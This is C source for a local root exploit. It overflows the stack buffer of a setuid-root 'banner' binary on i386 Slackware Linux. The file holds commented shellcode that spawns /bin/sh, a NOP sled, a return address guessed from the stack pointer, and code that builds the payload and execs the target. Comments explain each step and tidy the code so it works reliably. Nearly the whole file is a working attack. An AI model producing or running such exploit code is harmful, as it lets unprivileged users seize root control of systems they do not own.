/***********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
* permission to use/rewrite/add : granted *
* permission to trojan/steal : denied *
* permission to use illegally : denied *
* permission to use on /dev/urandom : denied *
***********************************************/
/* contact el8@press.co.jp for full license */
/* code copyrighted by ~el8 -- don't infringe! */
/*
* banner.c exploit
* lore
*
* banner exploit which works with all versions of slackware
*
 * Note: banner has to be setuid root for this to yield a root shell (about 30%
 * of the systems I ran across had banner installed setuid root). The payload
 * is i386 Linux only: it reads %esp and the shellcode uses int 0x80.
*/
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
 * NUL-free i386 Linux shellcode.  A jmp/call pair loads the address of the
 * trailing "/bin/sh" into %esi; the code then builds argv in place and does
 * execve("/bin/sh", {"/bin/sh", NULL}, envp-with-only-NULL) via int $0x80,
 * falling through to exit(0) if execve returns.  The nine '.' after "/bin/sh"
 * are scratch the code overwrites at run time (the string's NUL terminator,
 * argv[0] and the terminating NULL pointer), so they are padding, not data.
 */
char hellcode[] =
	"\xeb\x22"			/* jmp  +0x22   -> the call below           */
	"\x5e"				/* pop  %esi    ; %esi = &"/bin/sh"         */
	"\x89\xf3"			/* mov  %esi,%ebx                            */
	"\x89\xf7"			/* mov  %esi,%edi                            */
	"\x83\xc7\x07"			/* add  $7,%edi ; just past "/bin/sh"        */
	"\x31\xc0"			/* xor  %eax,%eax                            */
	"\xaa"				/* stosb        ; NUL-terminate the path     */
	"\x89\xf9"			/* mov  %edi,%ecx ; argv                     */
	"\x89\xf0"			/* mov  %esi,%eax                            */
	"\xab"				/* stosl        ; argv[0] = &"/bin/sh"       */
	"\x89\xfa"			/* mov  %edi,%edx ; envp -> the NULL below   */
	"\x31\xc0"			/* xor  %eax,%eax                            */
	"\xab"				/* stosl        ; argv[1] = NULL             */
	"\xb0\x08"			/* mov  $8,%al                               */
	"\x04\x03"			/* add  $3,%al  ; 11 = execve, no 0x0b byte  */
	"\xcd\x80"			/* int  $0x80                                */
	"\x31\xdb"			/* xor  %ebx,%ebx                            */
	"\x89\xd8"			/* mov  %ebx,%eax                            */
	"\x40"				/* inc  %eax    ; 1 = exit                   */
	"\xcd\x80"			/* int  $0x80                                */
	"\xe8\xd9\xff\xff\xff"		/* call -0x27   -> the pop %esi above        */
	"/bin/sh.........";
/*
* From banner.c
*/
#define MAXSEG (1024)		/* taken from banner.c (see comment above) */
#define BSIZE (MAXSEG)		/* size of the stack buffer in banner that overflows */
#define ESIZE ((BSIZE+8))	/* payload length: the buffer plus 8 bytes -- presumably saved %ebp and the return address; confirm against banner.c */
#define PATH ("/usr/bin/banner")	/* target binary; must be setuid root for the shell to be root */
#define OFFSET (400)		/* default amount subtracted from our %esp to guess the buffer's address (overridable via argv[1]) */
#define NOP (0x90)		/* i386 nop, fills the sled before the shellcode */
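long get_esp(void);

/*
 * Return the current stack pointer.  The exploit uses it as the base for
 * guessing where the overflowed buffer sits in banner's stack.
 *
 * The value is read through an explicit asm output operand and returned
 * normally; the old version had no return statement and only worked because
 * the asm happened to leave the value in %eax, which an optimizing compiler
 * is free to break.  The exploit is i386-only (%esp, int $0x80 shellcode);
 * on a 64-bit build this compiles but yields only the low 32 bits of %rsp.
 */
long
get_esp(void)
{
	unsigned int sp;

	__asm__ __volatile__("movl %%esp, %0" : "=r"(sp));
	return (long)sp;
}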
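/*
 * Build the overflow payload and exec the setuid banner with it as its
 * only argument.
 *
 * Layout of the ESIZE-byte argument: a NOP sled, the shellcode, then the
 * 4-byte little-endian address that overwrites banner's saved return
 * address.  That address is our own %esp minus an offset (OFFSET by
 * default, or argv[1]); it is only a guess, which is why it is tunable.
 *
 * Returns 1 on a bad offset, allocation failure or failed exec; on success
 * execl() does not return.
 */
int
main(int argc, char **argv)
{
	int offset = OFFSET;
	size_t sclen, nops, pos;
	unsigned long addr;
	char *evilbanner;

	if (argc > 1) {
		char *end;
		long v;

		/* strtol rather than atoi so junk or out-of-range input is
		 * rejected instead of silently becoming 0 */
		errno = 0;
		v = strtol(argv[1], &end, 10);
		if (end == argv[1] || *end != '\0' || errno == ERANGE
		    || v < INT_MIN || v > INT_MAX) {
			fprintf(stderr, "bad offset: %s\n", argv[1]);
			return 1;
		}
		offset = (int)v;
	}

	/* +1: execl() reads the payload as a C string, so it needs a NUL
	 * terminator beyond the ESIZE bytes banner is meant to see; without it
	 * the old code let strlen() run off the end of the malloc'd block */
	evilbanner = malloc(ESIZE + 1);
	if (evilbanner == NULL) {
		perror("malloc");
		return 1;
	}

	sclen = strlen(hellcode);
	nops = ESIZE - sclen - 4;
	memset(evilbanner, NOP, nops);
	memcpy(evilbanner + nops, hellcode, sclen);
	pos = nops + sclen;		/* == ESIZE - 4 */

	addr = (unsigned long)(get_esp() - offset);
	/* target is i386: emit exactly four little-endian bytes instead of
	 * storing a long through a cast pointer (8 bytes on LP64, and an
	 * unaligned store) */
	evilbanner[pos++] = (char)(addr & 0xff);
	evilbanner[pos++] = (char)((addr >> 8) & 0xff);
	evilbanner[pos++] = (char)((addr >> 16) & 0xff);
	evilbanner[pos++] = (char)((addr >> 24) & 0xff);
	evilbanner[pos] = '\0';

	fprintf(stderr, "banner exploit, lore\n");
	fprintf(stderr, "\nUsing address 0x%lx, offset %d\n", addr, offset);

	/* a zero byte anywhere in the payload truncates it at exec time; the
	 * sled and shellcode are NUL-free, so only the address can cause this */
	if (memchr(evilbanner, '\0', ESIZE) != NULL)
		fprintf(stderr, "warning: address contains a NUL byte, payload will be truncated\n");

	/* the list terminator must be a null pointer, not a bare 0 */
	execl(PATH, "banner", evilbanner, (char *)NULL);
	perror("execl");
	free(evilbanner);
	return 1;
}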